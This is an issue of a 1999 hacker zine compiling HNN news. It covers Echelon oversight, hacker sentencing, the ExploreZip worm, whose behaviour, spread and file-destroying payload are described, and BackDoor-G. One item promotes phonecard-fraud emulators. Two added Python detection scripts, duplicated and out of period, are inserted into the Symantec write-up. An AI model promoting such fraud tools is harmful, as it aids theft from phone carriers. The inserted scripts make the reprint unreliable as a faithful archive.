@HWA 19.0 Congress and NSA tangle over Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 9th 1999 From HNN http://www.hackernews.com/ Congress and NSA tangle over Echelon contributed by oolong The US Congress and the NSA seem to be butting heads over ECHELON.
While all this sounds altruistic, you can bet that it's the beginning of a high level power struggle over who controls the information. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0531/web-nsa-6-3-99.html JUNE 3, 1999 . . . 18:34 EDT Congress, NSA butt heads over Echelon BY DANIEL VERTON (dan_verton@fcw.com) Congress has squared off with the National Security Agency over a top-secret U.S. global electronic surveillance program, requesting top intelligence officials to report on the legal standards used to prevent privacy abuses against U.S. citizens. According to an amendment to the fiscal 2000 Intelligence Authorization Act proposed last month by Rep. Bob Barr (R-Ga.), the director of Central Intelligence, the director of NSA and the attorney general must submit a report within 60 days of the bill becoming law that outlines the legal standards being employed to safeguard the privacy of American citizens against Project Echelon. Echelon is NSA's Cold War-vintage global spying system, which consists of a worldwide network of clandestine listening posts capable of intercepting electronic communications such as e-mail, telephone conversations, faxes, satellite transmissions, microwave links and fiber-optic communications traffic. However, the European Union last year raised concerns that the system may be regularly violating the privacy of law-abiding citizens [FCW, Nov. 17, 1998]. However, NSA, the supersecret spy agency known best for its worldwide eavesdropping capabilities, for the first time in the history of the House Permanent Select Committee on Intelligence refused to hand over documents on the Echelon program, claiming attorney/client privilege. 
Congress is "concerned about the privacy rights of American citizens and whether or not there are constitutional safeguards being circumvented by the manner in which the intelligence agencies are intercepting and/or receiving international communications...from foreign nations that would otherwise be prohibited by...the limitations on the collection of domestic intelligence," Barr said. "This very straightforward amendment...will help guarantee the privacy rights of American citizens [and] will protect the oversight responsibilities of the Congress which are now under assault" by the intelligence community. Calling NSA's argument of attorney/client privilege "unpersuasive and dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of the intelligence community to deny access to documents on intelligence programs could "seriously hobble the legislative oversight process" provided for by the Constitution and would "result in the envelopment of the executive branch in a cloak of secrecy." @HWA 20.0 Emutronix Phone Hacking Products releases new Mach emulator ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 9th 1999 From HNN http://www.hackernews.com/ Emutronix Revs Mach contributed by Fr3akm4n Emutronix Phonecard Hacking Products have released their latest version of the Mach Emulation Software. Version 2.1 incorporates an easier working panel and is much more user friendly. Emutronix http://fly.to/mach3 (I'd check this site out b4 it gets closed down; cards start at $350 with a one-year guarantee for any country except France... - Ed ) @HWA 21.0 Is That Spelled With a "PH" or an "F" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ contributed by smith The Concise Oxford Dictionary has added some new words to its vernacular. One notable inclusion is the word "Phreaking" with a definition of hacking into the telephone network. Other new words include firewall and portal among others.
ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2272766,00.html The Concise Oxford Dictionary http://www.oed.com @HWA 22.0 The Demonizing of the Hacker ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond Are years in jail the correct answer for teenage script kiddies who deface web pages? Are dangerous precedents being created today that will limit personal freedom tomorrow? Are we running the risk of turning criminals into cultural icons? Peter Wayner takes a look at these complex questions. Salon http://www.salonmagazine.com/tech/feature/1999/06/09/hacker_penalties/index.html Should hackers spend years in prison? Stiff penalties for computer trespassing could create a broad new class of criminal -- including you and me. - - - - - - - - - - - - BY PETER WAYNER June 9, 1999 | The FBI recently declared war on those pesky hackers -- again. The news is filled with the story of some group known as Global Hell that is breaking into Web sites and causing mayhem. The FBI is cracking down, confiscating computers and taking names; and some hackers are actually fighting back and shutting down some government Web sites. The press loves hackers because computer crime is something new. (I'm using "hackers" the way the media does, to describe those who get their kicks breaking into computer systems, rather than the older usage describing those who delight in difficult software coding work.) Murder, rape, drug dealing, theft and fraud continue as always, with ups and downs in their rates -- but teenagers breaking into Web sites is something no one has seen before. The problem with the war against hackers is that most of what the hackers are supposedly doing would be trivial if it weren't happening on the Internet. The typical hacker attack on a Web site isn't much different from scrawling graffiti on the outside of a building.
Many attackers are just poking around -- like suburban teenagers who hop a fence to jump into a pool. All of this would be great theater and a nice distraction from the war in Kosovo if it weren't inspiring some serious reprisals in the courts -- and some ominous inflation in sentencing that could wind up affecting everyone who uses computers in his or her daily life. Wars on hackers are usually followed by calls for legislators to "do something!" and campaigns for new laws to crack down on the bad guys. The problem is that "doing something" often produces laws that treat the same action much more harshly in cyberspace than in "meatspace." The archetype of the demon hacker is Kevin Mitnick, a young man who has spent more than four years in jail waiting for his trial. When he was arrested, Monica Lewinsky was in her last year of college. During this time, Mitnick and his attorneys have jousted with government lawyers in endless pre-trial maneuvers that seem to have ended recently when Mitnick decided to plead guilty, probably hoping to receive a sentence that would be limited to time served. But even that deal is uncertain and taking forever to evolve; meanwhile, for Mitnick it's just prison without a trial and with no bail. Many, no doubt, see the crackdown on folks like Kevin Mitnick as a great deal for society: Information can be stolen just like anything else; surely the thieves who traffic in such goods should be locked up, just like car-jackers and muggers. But there's also a hidden danger. The precedents that the courts set now for dealing with demons like Mitnick will also apply equally to everyone who follows. And it's not clear that the world is ready for Mitnick-like sentences for the crimes he might have committed, which remain murkily defined. Think about it: Someone who reads another person's Rolodex is just a snoop, but someone who clicks through somebody else's Palm Pilot is hacking a computer database. 
It's easy to see just how slippery the calculus of evil gets on the cutting edge of technology. 2600 Magazine, The Hacker Quarterly, recently posted letters from computer manufacturers like Sun and Motorola estimating their losses to Mitnick's alleged theft of computer source code. After Mitnick's arrest, he was said to have stolen billions of dollars of information. Some companies calculated their loss by simply listing the hundreds of millions of dollars in development cost of the software affected -- that is, the cost of all the programmers, their computers and other overhead. Other companies were a bit more careful and noted that the value was difficult to judge, but that recalls of products like cell phones could be costly. The problem is, the price tag of information is almost impossible to determine. If Mitnick did take a copy of these companies' source code, the companies weren't denied the use of it, as when a mugger steals cash. Mitnick's lawyers seem ready to point out that the companies involved didn't bother to announce an official price on what they lost to Mitnick -- something that the Securities and Exchange Commission requires public companies to do if the losses are significant enough. That would have required strict accounting measures. To make matters even cloudier, in the meantime, Sun Microsystems began giving away the source code to its operating system to students around the world. In other words, if Mitnick had only waited a few years, enrolled in a university and asked nicely, he might have been a poster boy for Sun's charity instead of a prisoner. Today, Sun is even circulating the source code to products like Java in hope of recruiting customers and snagging bug fixes. The company is practically begging people around the world to come take a look at its code. This big change in the customs and attitudes of the software industry strains the arguments against hackers. 
If giving away the source code is now a "good thing" for corporations, did Mitnick and the other hackers do a smaller good thing by grabbing it ahead of time? Is Mitnick now a bit closer to being a Robin Hood instead of a demon? If Linux triumphs, will children be told tales of the dark days when the Sheriff of Nottingham sat on the boards of all of the corporations and forced them to keep their source code proprietary so only the nobles could enjoy its bounty? Is it true that begging forgiveness is always easier than asking permission? Such questions may be impossible to answer, but they illustrate just how confusing it can be in the nether-netherworld of information's hall of mirrors. As a commodity, information is fundamentally different from objects, and society has always graced it with special respect. The journalists who printed the stories about the allegedly racist words that appeared on a secret audio tape of Texaco employees looked like crusaders. But if it had been a digital tape, the reporters could be painted as hacking data compiled by a Texaco employee on Texaco time. In the long run, society is going to have to think differently about hackers and the crimes with which they are charged. Taking information when it's printed on paper is not always bad, and there's no reason we should change this rule just because the information is stored on a computer disk. The intent of the criminal and the extent of the malice has always played a crucial role in our system of criminal justice. Many owners of things will forgive a theft if the "borrower" merely returns it unharmed. Crimes like trespassing are rarely prosecuted if someone just hops a fence and does no damage. Computers and the Internet continue to frighten people, but prosecuting hackers runs the danger of setting nasty precedents that will begin to snare regular people, not programmers. Many convicted hackers are released from prison only to be denied the ability to use a computer or the Internet.
In the past, this made it impossible for a person to get work as a programmer; today, they can't even push the order screen at McDonald's. After all, it's hooked up to a central database -- who knows what havoc a hacker could wreak while punching up an order of fries? One of the best ways to put this all in context is to take yourself back in time 100 years to the turn of the last century, when auto racing was just beginning to roar across the scene. The machines were grand in size and sound if not in speed -- Emile Levassor won the 1895 Paris-Bordeaux race with his four-horsepower jack rabbit that covered the distance at an average speed of 14.9 mph. Feats of technical prowess like that frightened the world, and by 1903 the French government was shutting down auto races -- or restricting the death-defying machines to a bearable 20 mph. A few decades later, James Dean became a rebel automobile hacker who scared parents around the globe. Today, he's just another cutie pie competing with Hanson for poster space on dorm room walls. One era's demon is another's icon. Is teen idol the next stop for Kevin Mitnick? salon.com | June 9, 1999 - - - - - - - - - - - - About the writer Peter Wayner is the author of "Disappearing Cryptography," "Digital Cash" and "Digital Copyright Protection." @HWA 23.0 More Email Worms/Trojan ~~~~~~~~~~~~~~~~~~~~~~~~ June 10th 1999 From HNN http://www.hackernews.com/ More Email Worms/Trojan contributed by zuc Symantec has discovered a new malicious piece of software that travels as an email attachment named "zipped_files.exe". Similar to Melissa this worm/trojan uses the MAPI commands and Microsoft Outlook on Windows systems to replicate. This code was originally discovered in Israel. 
Symantec http://www.symantec.com/avcenter/venc/data/worm.explore.zip.html

Worm.ExploreZip

Virus Name: Worm.ExploreZip
Aliases: W32.ExploreZip Worm
Infection Length: 210,432 bytes
Area of Infection: Windows System directory, Email Attachments
Likelihood: Common, Worldwide
Detected as of: June 6, 1999
Characteristics: Worm, Trojan Horse

Overview: Worm.ExploreZip is a worm that contains a malicious payload. The worm utilizes Microsoft Outlook, Outlook Express, and Exchange to mail itself out by replying to unread messages in your Inbox. The worm will also search the mapped drives and networked machines for Windows installations and copy itself to the Windows directory of the remote machine and modify the WIN.INI accordingly. The payload of the worm will destroy any file with the extension .h, .c, .cpp, .asm, .doc, .ppt, or .xls on your hard drives, any mapped drives, and any network machines that are accessible each time it is executed. This continues to occur until the worm is removed. You may receive the worm as an attachment called zipped_files.exe. When run, this executable will copy itself to your Windows System directory with the filename Explore.exe or to your Windows directory with the filename _setup.exe. The worm modifies your WIN.INI or registry such that the file Explore.exe is executed each time you start Windows. The worm was first discovered in Israel and submitted to the Symantec AntiVirus Research Center on June 6, 1999.

Technical Description: Worm.ExploreZip utilizes MAPI commands and Microsoft Outlook/Microsoft Exchange on Windows 9x and NT systems to propagate itself. The worm e-mails itself out as an attachment with the filename zipped_files.exe in reply to unread messages it finds in your Inbox. Once it responds to a message in your Inbox, it will mark it so it will not respond to the message again.
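The indicators the write-up gives (the run= persistence line the worm plants in WIN.INI, the zipped_files.exe attachment with its canned "attached zipped docs" body text, and source and Office files truncated to zero bytes) are enough for a first-pass triage script. The following Python is an added example and is not part of Symantec's write-up or of this zine; the WIN.INI fragment, the e-mail message and the victim directory tree it inspects are all constructed inline for the demonstration, and the run=\Explore.exe form it matches is the one quoted in the repair notes later in the write-up.

```python
"""Triage checks for the Worm.ExploreZip indicators in the Symantec write-up.
Added example, not Symantec's or the zine's code; every input below is
constructed for the demonstration."""
import re
import tempfile
from email import message_from_string
from pathlib import Path, PureWindowsPath

# Indicators taken from the write-up: dropped file names, attachment name,
# the canned body text and the extensions the payload truncates to 0 bytes.
DROPPED_NAMES = {"explore.exe", "_setup.exe"}
ATTACHMENT_NAME = "zipped_files.exe"
BODY_MARKER = "take a look at the attached zipped docs"
PAYLOAD_EXTENSIONS = {".h", ".c", ".cpp", ".asm", ".doc", ".xls", ".ppt"}


def find_winini_persistence(win_ini_text):
    """Return the offending run= line from the [windows] section of a
    WIN.INI, or None.  Windows 9x launches every program named on that line
    at startup; the worm adds run=\\Explore.exe or run=\\_setup.exe."""
    in_windows = False
    for raw in win_ini_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_windows = line.lower() == "[windows]"
            continue
        if in_windows and line.lower().startswith("run="):
            # run= may list several programs separated by spaces or commas
            for prog in re.split(r"[ ,]+", line[4:]):
                if PureWindowsPath(prog).name.lower() in DROPPED_NAMES:
                    return line
    return None


def find_truncated_files(root):
    """List files under root whose extension is on the payload list and whose
    size is zero, the state CreateFile() leaves victims in.  Legitimately
    empty source files also match, so treat hits as leads, not verdicts."""
    hits = []
    for path in Path(root).rglob("*"):
        if (path.is_file() and path.suffix.lower() in PAYLOAD_EXTENSIONS
                and path.stat().st_size == 0):
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def looks_like_worm_reply(raw_message):
    """True when an RFC 822 message carries the zipped_files.exe attachment
    together with the canned body text the worm uses in its replies."""
    msg = message_from_string(raw_message)
    has_attachment = has_body = False
    for part in msg.walk():
        name = part.get_filename()
        if name and name.lower() == ATTACHMENT_NAME:
            has_attachment = True
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            if BODY_MARKER in payload.decode("latin-1").lower():
                has_body = True
    return has_attachment and has_body


def demo():
    """Run the three checks against constructed inputs and return the results."""
    # constructed WIN.INI with the persistence line from the repair notes
    win_ini = "[windows]\nload=\nrun=\\Explore.exe\n[Desktop]\nWallpaper=(None)\n"
    # constructed reply using the body text quoted in the write-up
    mail = (
        "From: alice@example.test\r\nTo: bob@example.test\r\n"
        "Subject: Re: build notes\r\nMIME-Version: 1.0\r\n"
        'Content-Type: multipart/mixed; boundary="b1"\r\n\r\n'
        "--b1\r\nContent-Type: text/plain\r\n\r\n"
        "Hi bob! I received your email and I shall send you a reply ASAP. "
        "Till then, take a look at the attached zipped docs.\r\nbye\r\n"
        '--b1\r\nContent-Type: application/octet-stream; name="zipped_files.exe"\r\n'
        'Content-Disposition: attachment; filename="zipped_files.exe"\r\n\r\n'
        "MZ\r\n--b1--\r\n"
    )
    with tempfile.TemporaryDirectory() as root:
        # constructed victim tree: two truncated targets, one intact, one empty .txt
        Path(root, "src").mkdir()
        Path(root, "src", "main.c").write_bytes(b"")
        Path(root, "src", "notes.doc").write_bytes(b"")
        Path(root, "src", "util.cpp").write_bytes(b"int x;\n")
        Path(root, "README.txt").write_bytes(b"")
        truncated = find_truncated_files(root)
    return {
        "persistence": find_winini_persistence(win_ini),
        "truncated": truncated,
        "worm_mail": looks_like_worm_reply(mail),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The WIN.INI check covers the Windows 9x persistence only; on NT the write-up says the same program name lands in the registry value HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run, which has to be read on the live system (winreg) rather than from a text file. A run= hit or a zero-byte .c file is a lead to confirm by hand, not a verdict, since legitimate startup programs and empty source files produce the same signal.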
The e-mail message sent may appear to come from a known e-mail correspondent in response to a previously sent e-mail with the appropriate subject line and contains the following text:

    Hi Recipient Name!

    I received your email and I shall send you a reply ASAP.
    Till then, take a look at the attached zipped docs.

    bye or sincerely
    Recipient Name

The worm will continue to monitor the Inbox for new messages and respond accordingly. The worm will also search the mapped drives and networked machines for Windows installations and copy itself to the Windows directory of the remote machine and modify the WIN.INI accordingly.

Once the attachment is executed, it may display the following window:

The button displayed is the "OK" button and is dependent on the language of the infected operating system. The example above was taken from a Hebrew Windows system.

The worm also copies itself to the Windows System (System32 on Windows NT) directory with the filename Explore.exe or _setup.exe and also modifies the WIN.INI file (Windows 9x) or the registry (on Windows NT) so that the program is executed each time Windows is started.

You may find this file under your Windows Temporary directory or your attachments directory as well, depending on the e-mail client you are using. E-mail clients will often temporarily store e-mail attachments in these directories under different temporary names.

Payload:

In addition, when Worm.ExploreZip is executed, it also searches through the C through Z drives of your computer system and accessible network machines for particular files. The worm selects a series of files to destroy of multiple file extensions (including .h, .c, .cpp, .asm, .doc, .xls, .ppt) by calling CreateFile() and making them 0 bytes long. One may notice extended hard drive activity when this occurs. This can result in non-recoverable data. This payload routine continues to happen while the worm is active on the system.
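The two artifacts the write-up describes, the WIN.INI run= entry (or the NT registry Run value) that launches Explore.exe/_setup.exe and the automatic reply carrying zipped_files.exe, can be checked for offline. This is an added Python example, not part of the Symantec write-up; the WIN.INI text and the mail message it runs on are constructed samples, and the space-splitting of Run values is a heuristic.

```python
"""Triage checks for the Worm.ExploreZip indicators in the Symantec write-up.

Added example, not part of the write-up. Nothing here touches a live
system: callers pass in the text of WIN.INI (Windows 9x), the data of the
NT Run value, or a captured mail message, and get findings back.
"""
import re
from email import message_from_string

# File names the worm copies itself under (Explore.exe in the System
# directory, _setup.exe in the Windows directory).
WORM_BINARIES = {"explore.exe", "_setup.exe"}
# Extensions the payload truncates to 0 bytes via CreateFile().
TARGET_EXTENSIONS = (".h", ".c", ".cpp", ".asm", ".doc", ".ppt", ".xls")
# Name of the attachment on the worm's automatic reply.
LURE_ATTACHMENT = "zipped_files.exe"
# Distinctive phrase from the reply body quoted in the write-up.
LURE_PHRASE = "take a look at the attached zipped docs"


def _basename(path):
    """Lower-cased file name from a Windows path, bare name or leading backslash."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def _programs(value):
    """Split a run=/load= style value into program tokens (comma or space separated)."""
    return [p for p in re.split(r"[,\s]+", value.strip()) if p]


def check_win_ini(win_ini_text):
    """Return the run=/load= lines in [windows] that launch a worm binary.

    WIN.INI is parsed by hand: it is not strict INI (duplicate keys, no
    quoting rules) and the entry the worm adds looks like run=\\Explore.exe,
    i.e. a leading backslash and no directory.
    """
    findings = []
    section = None
    for raw in win_ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "windows" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip().lower() in ("run", "load") and any(
            _basename(p) in WORM_BINARIES for p in _programs(value)
        ):
            findings.append(line)
    return findings


def check_nt_run_value(run_value):
    """True if the Windows NT Run value (under HKEY_CURRENT_USER\\Software\\
    Microsoft\\Windows NT\\CurrentVersion\\Windows) refers to a worm binary.
    Space splitting is a heuristic; unquoted paths with spaces are checked
    token by token."""
    return any(_basename(p) in WORM_BINARIES for p in _programs(run_value or ""))


def check_mail(raw_message):
    """Return the reasons a captured RFC 822 message matches the lure (or [])."""
    reasons = []
    for part in message_from_string(raw_message).walk():
        name = part.get_filename()
        if name and name.lower() == LURE_ATTACHMENT:
            reasons.append("attachment " + name)
        if part.get_content_type() == "text/plain":
            body = part.get_payload(decode=True) or b""
            if LURE_PHRASE in body.decode("latin-1").lower():
                reasons.append("lure body text")
    return reasons


def is_payload_target(filename):
    """True if the payload would truncate this file (extension match, any case)."""
    return filename.lower().endswith(TARGET_EXTENSIONS)


# Constructed samples (not captured from a real infection).
SAMPLE_WIN_INI = "\n".join([
    "[windows]",
    "load=",
    "run=\\Explore.exe",
    "NullPort=None",
    "[Desktop]",
    "Wallpaper=(None)",
])

SAMPLE_MAIL = "\n".join([
    "From: colleague@example.com",
    "To: victim@example.com",
    "Subject: Re: meeting notes",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="b1"',
    "",
    "--b1",
    "Content-Type: text/plain",
    "",
    "Hi Victim!",
    "I received your email and I shall send you a reply ASAP.",
    "Till then, take a look at the attached zipped docs.",
    "bye",
    "--b1",
    'Content-Type: application/octet-stream; name="zipped_files.exe"',
    'Content-Disposition: attachment; filename="zipped_files.exe"',
    "Content-Transfer-Encoding: base64",
    "",
    "AAAA",  # placeholder bytes, not the worm
    "--b1--",
])

if __name__ == "__main__":
    print("WIN.INI findings:", check_win_ini(SAMPLE_WIN_INI))
    print("mail findings:", check_mail(SAMPLE_MAIL))
    print("would be truncated:", [f for f in ("main.cpp", "README.TXT") if is_payload_target(f)])
```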
Thus, any newly created files matching the extensions list will be destroyed as well.

Repair Notes:

Symantec AntiVirus Research Center has also provided a small utility called KILL_EZ to remove the virus from memory to avoid rebooting from a clean system disk. For more information on the KILL_EZ utility, refer to the following URL:

http://www.sarc.com/avcenter/kill_ez.html

To remove this worm manually, one should perform the following steps:

1. Remove the line run=\Explore.exe or run=\_setup.exe from the WIN.INI file for Windows 9x systems. For Windows NT, remove the registry entry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run which will refer to Explore.exe or _setup.exe.

2. Delete the file Explore.exe or _setup.exe. One may need to reboot first or kill the process using Task Manager or Process View (if the file is currently in use).

Norton AntiVirus users can protect themselves from this worm by downloading the current virus definitions either through LiveUpdate or from the following webpage:

http://www.symantec.com/avcenter/download.html

Write-up by: Eric Chien
Written: June 6, 1999
Update: June 11, 1999

@HWA

24.0 Stanford Searches for "Hacker"
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 10th 1999

From HNN http://www.hackernews.com/

Stanford Searches for "Hacker"

contributed by Dead.Under.Water

Stanford University was a victim of a spammer recently. A message, sent to some 25,000 Stanford email accounts, accused the school of giving housing preferences to minorities. Prosecutor Julius Finkelstein, head of Santa Clara County's high-tech crimes unit, said the "hacker" could be charged with such offenses as unauthorized use of a computer account and harassment via e-mail. Evidently sending hate-filled emails grants you the hacker moniker?
Yahoo News
http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990603/tc/racist_mail_1.html
( this link didn't work as of June 24th -Ed )

@HWA

25.0 Mitnick Demo Pictures now Available
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 10th 1999

From HNN http://www.hackernews.com/

Mitnick Demo Pictures now Available

contributed by Macki

Pictures of the FREE KEVIN Demonstrations held last week in front of federal courthouses across the country have been posted. Pictures from the demonstrations in Cleveland, New York, and Moscow have been made available at the FREE KEVIN Demos website. Kevin Mitnick's sentencing hearing is scheduled for Monday, June 14th.

FREE KEVIN Demonstrations
http://www.2600.com/demo/index.html

26.0 Does Cracking Affect Consumer Confidence?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 10th 1999

From HNN http://www.hackernews.com/

Does Cracking Affect Consumer Confidence?

contributed by evenprime

Eric Lundquist thinks that it is wrong to crack servers because doing so undermines consumers' confidence in e-commerce. (In my opinion consumers would be wise not to trust e-commerce.) Interesting how the author never gets around to blaming vendors who tell people to place their trust in the rubbish that is being sold.

ZD Net
http://www.zdnet.com/zdnn/stories/comment/0,5859,406094,00.html

27.0 Worm.ExploreZip is Causing Massive Damage
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 11th 1999

From HNN http://www.hackernews.com/

contributed by Merlock

Worm.ExploreZip is quickly spreading across the world. First discovered last Sunday in Israel, it has propagated into some of the largest companies in the US. The transmission method of this program is similar to Melissa, which uses the email addresses in the Microsoft Outlook address book; Worm.ExploreZip, however, automatically replies to the incoming email of MS Exchange or MS Outlook users.
Unlike Melissa, Worm.ExploreZip carries a very malicious payload that will actually delete certain files and modify others. Companies such as Boeing, Price Waterhouse Coopers, GTE, and General Electric have lost entire hard drives to this virus. Many companies are attempting to be proactive by disconnecting themselves from the internet. Only users of Microsoft products are affected by this latest threat.

ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/worm990610.html

C|Net
http://www.news.com/News/Item/0,4,37658,00.html?st.ne.fd.gif.d

MSNBC
http://www.msnbc.com/news/278660.asp

ZD Net
http://www.zdnet.com/pcweek/stories/news/0,4153,2273659,00.html

Nando Times
http://www.techserver.com/story/body/0,1634,58370-93054-664175-0,00.html

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11334,00.html

ZD Net
http://www.zdnet.com/zdnn/special/doublevirus.html

C|Net;

Data virus forces email shutdowns
By Kim Girard
Staff Writer, CNET News.com
June 10, 1999, 7:10 p.m. PT

update Corporations are scrambling to cope with a new data-destroying virus that is forcing the shutdown of email systems nationwide.

The virus, first reported to the Symantec Antivirus Research Center on Sunday by five companies in Israel, is called Worm.ExploreZip or Troj_Explore.Zip. The worm uses Mail Application Programming Interface (MAPI) commands and Microsoft Outlook on Windows systems to propagate itself, Symantec said.

In some ways, the virus is the sequel to the Melissa virus, which spread with unprecedented speed in March. Worm.ExploreZip spreads from computer to computer by taking advantage of automation features available to people using Microsoft email software on Windows machines.

Although the new virus doesn't spread as fast as Melissa, it causes more damage, according to antivirus experts, deleting Microsoft Word, Excel, and Powerpoint document files, among others. (See CNET Topic Center on antivirus software.)
Several firms have shut down their email systems entirely while IS staff root out the virus, according to Symantec.

Boeing was hit particularly hard. The Seattle-based aerospace giant shut down its email system, which is used by at least 150,000 employees, at 2:30 p.m. today, a company spokesman said. The company was still assessing the damage caused by the virus, but the spokesman, who asked not to be named, said he knew of at least one employee whose entire hard drive was wiped out.

"As soon as we became aware of it, we told everyone, and we put a message up on our internal Web site," he said. Late in the day the email still had not been restored. The company hopes to have it back up by tomorrow.

PricewaterhouseCoopers took down its entire email system, used by 45,000 U.S. employees, also at 2:30 p.m. in response to the virus. The company was just bringing up parts of the system at 7 p.m., a company spokesman said, but he didn't know how much damage had been done or how many workers had been affected.

Some companies said they disarmed the virus--actually a software "worm"--before it could cause many problems. Microsoft, for example, disconnected its email servers from the Internet at about 9 a.m. so that programmers could work on an antidote, company spokesman Dan Leach said. The servers were up and running two hours later, he added.

Employees of antivirus software maker Symantec report that they have received email that includes the worm, which arrives as an attachment to the missives. Companies such as General Electric and Southern Company have had files deleted by the virus, according to Bloomberg.

Virus protection firm Trend Micro spokeswoman Susan Orbuch said earlier today that the company had received 107 calls from customers concerning the virus. Thirteen of those calls came from those already infected, she said. Orbuch said that Trend Micro knew of five large companies that had been infected, as well as several public relations firms and a magazine.
She declined to name the companies.

Nate Meyer, spokesman for Credit Suisse First Boston, said the virus had struck the company's offices in New York, San Francisco, and Palo Alto, California, and that other offices worldwide may have been affected. He said he did not know how many of the company's computers were infected.

Meyer said Credit Suisse's technology department had been working on the problem for much of the day and had sent out a warning about it this morning. But he said the virus did not seem to have slowed the company's operations, adding that it had not disrupted the investment company's stock trading. Meyer noted that his own email had been working throughout the day.

Quick repairs

Representatives at AT&T and Intel reported that they were able to quickly repair their systems after being hit by the virus. "These are things that we have to do because of the communications reality that we live in today," an AT&T spokeswoman said.

The virus disrupted work at Cambridge, Massachusetts-based industry analyst firm Forrester Research, where Internet access, including email, was cut off.

Another analyst firm, Current Analysis, sent email to customers warning them not to open any email attachments coming from the firm with the .exe extension because an employee's PC had been infected.

The infected email may contain the message: "Hi [recipient name]! I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs. bye."

Unlike the Melissa virus, which harvested from a user's address book, the new virus raids an email in-box when executed through Microsoft Exchange or Outlook. The worm attaches itself as a file called zip_files.exe and is sent off with a return email. Although the virus isn't expected to spread as quickly and to as many computers as Melissa did, it does destroy files.

"It's an .exe file posing as a Zip file," said Eric Chien, senior researcher at the Symantec Antivirus Research Center.
The worm is particularly insidious because it searches through hard drives and destroys files with extensions of .doc, .xls, .ppt, .c, .cpp, .h, or .asm, he said.

Chien said that means whoever wrote the virus was targeting corporations--seeking to destroy developers' source code, as well as documents created using Microsoft Office applications, such as Word and Excel. "It singles out those files and destroys them," he said. "This hits the local drive and the file server."

Extent of damage not known

Chien said it is unclear how much damage the virus has done. "We've received multiple reports from major corporations in the U.S.," he said. "What we're hoping is that the initial jump on this Sunday night will prevent it from spreading."

Panda Software said it has added free downloads for the detection and disinfection of the virus--which it called "extremely dangerous"--on its Web site. The company also urged people to update antivirus software.

Esther Shin, a public relations specialist at Aventail, a Seattle-based business-to-business e-commerce firm, said two of her colleagues encountered the virus this morning. One of them lost all the files on his hard drive after he opened the attachment, she added. The email was worded to make the recipient believe that the message came from a Microsoft employee, she said.

Shin said she got a similar email but didn't open the attachment. "When I got hit I called all my contacts," she said.

Bloomberg and News.com's Troy Wolverton, Dan Goodin, and Tim Clark contributed to this report.

@HWA

28.0 Don't Forget About BackDoor-G, it is Still Around
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 11th 1999

From HNN http://www.hackernews.com/

contributed by Weld Pond

Don't forget about BackDoor-G. It also arrives as an email attachment, but instead of deleting files this one could allow someone else to control your computer behind the veil of a screensaver.
The Irish Times
http://www.ireland.com/newspaper/finance/1999/0604/fin320.htm

Bug hits big screen by the backdoor

Backdoor-G virus arrives by e-mail and sets up a screensaver which lets hacker control computer remotely

As if you didn't already have enough worries. The wary computer user already feels bunkered in and hunkered down, in between hiding behind firewalls, running anti-virus programs and keeping a watchful eye on suspicious-looking e-mails. You have to look out for infected files on floppy disks, panic over the latest holes in e-mail programs, and be cautious with how you set up company and personal websites. It's almost enough to send you back to a manual typewriter.

Now comes an insidious screensaver virus - a new computer devastator that sneaks into your system via an e-mail and sets up a screensaver which lets some bad-guy hacker control your computer remotely, download files, and all that other stuff that appears in Tom Cruise films but which we would all rather believe couldn't happen in real life.

According to security software company Network Associates, Backdoor-G is a so-called "trojan horse" program, which arrives into your computer hidden inside an attack program which potential victims receive as an unsolicited e-mail. The program has reportedly taken the form of both a screensaver and an update to a computer game.

Open the e-mail and the program installs itself, allowing Backdoor-G to turn the victim's computer into a client system. In other words, it allows a hacker to operate the victim's computer remotely over the Internet. The hacker can thus gain access to just about anything on the victim's computer. Unfortunately, it's also almost impossible to detect once it executes because it is capable of changing its file name. And according to Network Associates, it spreads everywhere in your computer's system.
Admittedly, the screensaver aspect of this virus has its amusement potential - hmmm, can't we all imagine a bitter and twisted screensaver we'd like to design to announce our conquest of the computer belonging to some particularly detested person in our lives? But the arrival of Backdoor-G is probably more apt to make you sigh in exasperation.

Computers were supposed to make life easier, more manageable, more controllable. Okay, you can stop laughing, but you know what I mean. Instead, they just seem to bring more stress, hair loss, heartburn and overly-chewed fingernails.

But it's perhaps wise to remind computer users that many, if not most, aggravations come not from the machines or even, sometimes, the software. They come from humans who still make far too many assumptions about what computers, software, and the Internet can or cannot do.

